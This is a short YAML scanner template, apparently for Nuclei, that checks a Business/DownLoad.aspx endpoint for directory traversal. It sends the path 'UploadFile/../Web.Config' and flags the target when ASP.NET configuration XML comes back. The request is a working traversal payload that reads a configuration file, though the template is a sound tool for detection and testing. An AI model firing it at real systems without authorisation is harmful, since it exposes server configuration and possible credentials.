id: business-download-directory-traversal

info:
  name: Directory Traversal in Business Download Endpoint
  author: chippa vijay kumar
  severity: high
  description: This template checks for directory traversal vulnerability by attempting to access the Web.Config file through the Business/DownLoad.aspx endpoint.
  tags: directory-traversal, config-exposure

requests:
  - method: GET
    path:
      - "{{BaseURL}}/Business/DownLoad.aspx?p=UploadFile/../Web.Config"

    headers:
      User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
      Content-Type: "application/x-www-form-urlencoded"
      Accept-Encoding: "gzip, deflate"
      Accept: "*/*"
      Connection: "keep-alive"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<configuration>"
          - "<system.web>"
        part: body

      - type: status
        status:
          - 200
